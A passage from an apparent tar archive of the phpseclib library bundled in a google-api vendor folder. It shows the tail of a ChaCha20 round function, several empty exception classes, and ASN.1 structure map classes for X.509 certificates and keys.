^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // columnRound $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 16); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 12); $x0+= $x4; $x12 = self::leftRotate(intval($x12) ^ intval($x0), 8); $x8+= $x12; $x4 = self::leftRotate(intval($x4) ^ intval($x8), 7); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 16); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 12); $x1+= $x5; $x13 = self::leftRotate(intval($x13) ^ intval($x1), 8); $x9+= $x13; $x5 = self::leftRotate(intval($x5) ^ intval($x9), 7); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 16); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 12); $x2+= $x6; $x14 = self::leftRotate(intval($x14) ^ intval($x2), 8); $x10+= $x14; $x6 = self::leftRotate(intval($x6) ^ intval($x10), 7); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 16); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 12); $x3+= $x7; $x15 = self::leftRotate(intval($x15) ^ intval($x3), 8); $x11+= $x15; $x7 = self::leftRotate(intval($x7) ^ intval($x11), 7); // rowRound $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 16); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 12); $x0+= $x5; $x15 = self::leftRotate(intval($x15) ^ intval($x0), 8); $x10+= $x15; $x5 = self::leftRotate(intval($x5) ^ intval($x10), 7); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 16); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 12); $x1+= $x6; $x12 = self::leftRotate(intval($x12) ^ intval($x1), 8); $x11+= $x12; $x6 = self::leftRotate(intval($x6) ^ intval($x11), 7); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 16); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 12); $x2+= $x7; $x13 = self::leftRotate(intval($x13) ^ intval($x2), 8); $x8+= $x13; $x7 = self::leftRotate(intval($x7) ^ intval($x8), 7); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 16); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 12); $x3+= $x4; $x14 = self::leftRotate(intval($x14) ^ intval($x3), 8); $x9+= $x14; $x4 = self::leftRotate(intval($x4) ^ intval($x9), 7); // @codingStandardsIgnoreEnd $x0 += $z0; $x1 += $z1; $x2 += $z2; $x3 += $z3; $x4 += $z4; $x5 += $z5; $x6 += $z6; $x7 += $z7; $x8 += $z8; $x9 += $z9; $x10 += $z10; $x11 += $z11; $x12 += $z12; $x13 += $z13; $x14 += $z14; $x15 += $z15; return pack('V*', $x0, $x1, $x2, $x3, $x4, $x5, $x6, $x7, $x8, $x9, $x10, $x11, $x12, $x13, $x14, $x15); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/UnableToConnectException.php000064400000000707147600400120025326 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * UnableToConnectException * * @author Jim Wigginton */ class UnableToConnectException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/NoSupportedAlgorithmsException.php000064400000000731147600400120026614 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * NoSupportedAlgorithmsException * * @author Jim Wigginton */ class NoSupportedAlgorithmsException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/UnsupportedAlgorithmException.php000064400000000726147600400120026503 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * UnsupportedAlgorithmException * * @author Jim Wigginton */ class UnsupportedAlgorithmException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/BadConfigurationException.php000064400000000712147600400120025515 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * BadConfigurationException * * @author Jim Wigginton */ class BadConfigurationException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/InconsistentSetupException.php000064400000000715147600400120026003 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * InconsistentSetupException * * @author Jim Wigginton */ class InconsistentSetupException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/UnsupportedCurveException.php000064400000000712147600400120025634 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * UnsupportedCurveException * * @author Jim Wigginton */ class UnsupportedCurveException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/BadModeException.php000064400000000657147600400120023602 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * BadModeException * * @author Jim Wigginton */ class BadModeException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/InsufficientSetupException.php000064400000000715147600400120025751 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * InsufficientSetupException * * @author Jim Wigginton */ class InsufficientSetupException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/FileNotFoundException.php000064400000000676147600400120024644 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * FileNotFoundException * * @author Jim Wigginton */ class FileNotFoundException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/BadDecryptionException.php000064400000000701147600400120025024 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * BadDecryptionException * * @author Jim Wigginton */ class BadDecryptionException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/NoKeyLoadedException.php000064400000000673147600400120024443 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * NoKeyLoadedException * * @author Jim Wigginton */ class NoKeyLoadedException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/UnsupportedFormatException.php000064400000000715147600400120026003 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * UnsupportedFormatException * * @author Jim Wigginton */ class UnsupportedFormatException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/UnsupportedOperationException.php000064400000000726147600400120026515 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * UnsupportedOperationException * * @author Jim Wigginton */ class UnsupportedOperationException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/Exception/ConnectionClosedException.php000064400000000712147600400120025530 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Exception; /** * ConnectionClosedException * * @author Jim Wigginton */ class ConnectionClosedException extends \RuntimeException { } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DssSigValue.php000064400000001166147600400120023140 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DssSigValue * * @author Jim Wigginton */ abstract class DssSigValue { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'r' => ['type' => ASN1::TYPE_INTEGER], 's' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DistributionPoint.php000064400000002050147600400120024431 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DistributionPoint * * @author Jim Wigginton */ abstract class DistributionPoint { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'distributionPoint' => [ 'constant' => 0, 'optional' => true, 'explicit' => true ] + DistributionPointName::MAP, 'reasons' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + ReasonFlags::MAP, 'cRLIssuer' => [ 'constant' => 2, 'optional' => true, 'implicit' => true ] + GeneralNames::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLNumber.php000064400000000731147600400120022535 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CRLNumber * * @author Jim Wigginton */ abstract class CRLNumber { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtensionAttributes.php000064400000001165147600400120024771 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ExtensionAttributes * * @author Jim Wigginton */ abstract class ExtensionAttributes { const MAP = [ 'type' => ASN1::TYPE_SET, 'min' => 1, 'max' => 256, // ub-extension-attributes 'children' => ExtensionAttribute::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLReason.php000064400000001542147600400120022535 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CRLReason * * @author Jim Wigginton */ abstract class CRLReason { const MAP = [ 'type' => ASN1::TYPE_ENUMERATED, 'mapping' => [ 'unspecified', 'keyCompromise', 'cACompromise', 'affiliationChanged', 'superseded', 'cessationOfOperation', 'certificateHold', // Value 7 is not used. 8 => 'removeFromCRL', 'privilegeWithdrawn', 'aACompromise' ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSAPublicKey.php000064400000001214147600400120023176 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RSAPublicKey * * @author Jim Wigginton */ abstract class RSAPublicKey { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'modulus' => ['type' => ASN1::TYPE_INTEGER], 'publicExponent' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EncryptedPrivateKeyInfo.php000064400000001246147600400120025523 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * EncryptedPrivateKeyInfo * * @author Jim Wigginton */ abstract class EncryptedPrivateKeyInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'encryptionAlgorithm' => AlgorithmIdentifier::MAP, 'encryptedData' => EncryptedData::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKeyAndChallenge.php000064400000001235147600400120025061 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PublicKeyAndChallenge * * @author Jim Wigginton */ abstract class PublicKeyAndChallenge { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'spki' => SubjectPublicKeyInfo::MAP, 'challenge' => ['type' => ASN1::TYPE_IA5_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Attribute.php000064400000001361147600400120022707 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Attribute * * @author Jim Wigginton */ abstract class Attribute { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'type' => AttributeType::MAP, 'value' => [ 'type' => ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => AttributeValue::MAP ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKey.php000064400000000741147600400120023030 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PrivateKey * * @author Jim Wigginton */ abstract class PrivateKey { const MAP = ['type' => ASN1::TYPE_OCTET_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertPolicyId.php000064400000000754147600400120023303 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertPolicyId * * @author Jim Wigginton */ abstract class CertPolicyId { const MAP = ['type' => ASN1::TYPE_OBJECT_IDENTIFIER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Name.php000064400000001050147600400120021617 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Name * * @author Jim Wigginton */ abstract class Name { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'rdnSequence' => RDNSequence::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AdministrationDomainName.php000064400000001653147600400120025666 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AdministrationDomainName * * @author Jim Wigginton */ abstract class AdministrationDomainName { const MAP = [ 'type' => ASN1::TYPE_CHOICE, // if class isn't present it's assumed to be \phpseclib3\File\ASN1::CLASS_UNIVERSAL or // (if constant is present) \phpseclib3\File\ASN1::CLASS_CONTEXT_SPECIFIC 'class' => ASN1::CLASS_APPLICATION, 'cast' => 2, 'children' => [ 'numeric' => ['type' => ASN1::TYPE_NUMERIC_STRING], 'printable' => ['type' => ASN1::TYPE_PRINTABLE_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyQualifierId.php000064400000000773147600400120024330 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PolicyQualifierId * * @author Jim Wigginton */ abstract class PolicyQualifierId { const MAP = ['type' => ASN1::TYPE_OBJECT_IDENTIFIER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DigestInfo.php000064400000001301147600400120022771 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DigestInfo * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class DigestInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'digestAlgorithm' => AlgorithmIdentifier::MAP, 'digest' => ['type' => ASN1::TYPE_OCTET_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSASSA_PSS_params.php000064400000002767147600400120024043 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RSASSA_PSS_params * * @author Jim Wigginton */ abstract class RSASSA_PSS_params { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'hashAlgorithm' => [ 'constant' => 0, 'optional' => true, 'explicit' => true, //'default' => 'sha1Identifier' ] + HashAlgorithm::MAP, 'maskGenAlgorithm' => [ 'constant' => 1, 'optional' => true, 'explicit' => true, //'default' => 'mgf1SHA1Identifier' ] + MaskGenAlgorithm::MAP, 'saltLength' => [ 'type' => ASN1::TYPE_INTEGER, 'constant' => 2, 'optional' => true, 'explicit' => true, 'default' => 20 ], 'trailerField' => [ 'type' => ASN1::TYPE_INTEGER, 'constant' => 3, 'optional' => true, 'explicit' => true, 'default' => 1 ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/FieldID.php000064400000001303147600400120022200 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * FieldID * * @author Jim Wigginton */ abstract class FieldID { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'fieldType' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => [ 'type' => ASN1::TYPE_ANY, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NumericUserIdentifier.php000064400000001004147600400120025202 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * NumericUserIdentifier * * @author Jim Wigginton */ abstract class NumericUserIdentifier { const MAP = ['type' => ASN1::TYPE_NUMERIC_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBEParameter.php000064400000001312147600400120023207 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PBEParameter * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class PBEParameter { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'salt' => ['type' => ASN1::TYPE_OCTET_STRING], 'iterationCount' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtensionAttribute.php000064400000001715147600400120024607 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ExtensionAttribute * * @author Jim Wigginton */ abstract class ExtensionAttribute { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'extension-attribute-type' => [ 'type' => ASN1::TYPE_PRINTABLE_STRING, 'constant' => 0, 'optional' => true, 'implicit' => true ], 'extension-attribute-value' => [ 'type' => ASN1::TYPE_ANY, 'constant' => 1, 'optional' => true, 'explicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyQualifierInfo.php000064400000001232147600400120024656 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PolicyQualifierInfo * * @author Jim Wigginton */ abstract class PolicyQualifierInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'policyQualifierId' => PolicyQualifierId::MAP, 'qualifier' => ['type' => ASN1::TYPE_ANY] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificationRequest.php000064400000001360147600400120025077 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertificationRequest * * @author Jim Wigginton */ abstract class CertificationRequest { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'certificationRequestInfo' => CertificationRequestInfo::MAP, 'signatureAlgorithm' => AlgorithmIdentifier::MAP, 'signature' => ['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Validity.php000064400000001122147600400120022524 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Validity * * @author Jim Wigginton */ abstract class Validity { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'notBefore' => Time::MAP, 'notAfter' => Time::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EncryptedData.php000064400000000752147600400120023476 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * EncryptedData * * @author Jim Wigginton */ abstract class EncryptedData { const MAP = ['type' => ASN1::TYPE_OCTET_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AnotherName.php000064400000001415147600400120023145 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AnotherName * * @author Jim Wigginton */ abstract class AnotherName { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'type-id' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'value' => [ 'type' => ASN1::TYPE_ANY, 'constant' => 0, 'optional' => true, 'explicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificatePolicies.php000064400000001135147600400120024655 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertificatePolicies * * @author Jim Wigginton */ abstract class CertificatePolicies { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => PolicyInformation::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Certificate.php000064400000001301147600400120023160 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Certificate * * @author Jim Wigginton */ abstract class Certificate { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'tbsCertificate' => TBSCertificate::MAP, 'signatureAlgorithm' => AlgorithmIdentifier::MAP, 'signature' => ['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OtherPrimeInfos.php000064400000001206147600400120024017 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * OtherPrimeInfos * * @author Jim Wigginton */ abstract class OtherPrimeInfos { // version must be multi if otherPrimeInfos present const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => OtherPrimeInfo::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ReasonFlags.php000064400000001435147600400120023152 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ReasonFlags * * @author Jim Wigginton */ abstract class ReasonFlags { const MAP = [ 'type' => ASN1::TYPE_BIT_STRING, 'mapping' => [ 'unused', 'keyCompromise', 'cACompromise', 'affiliationChanged', 'superseded', 'cessationOfOperation', 'certificateHold', 'privilegeWithdrawn', 'aACompromise' ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectAltName.php000064400000000700147600400120023601 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; /** * SubjectAltName * * @author Jim Wigginton */ abstract class SubjectAltName { const MAP = GeneralNames::MAP; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Time.php000064400000001171147600400120021641 0ustar00 * @copyright 2016 Jim Wigginton * @license 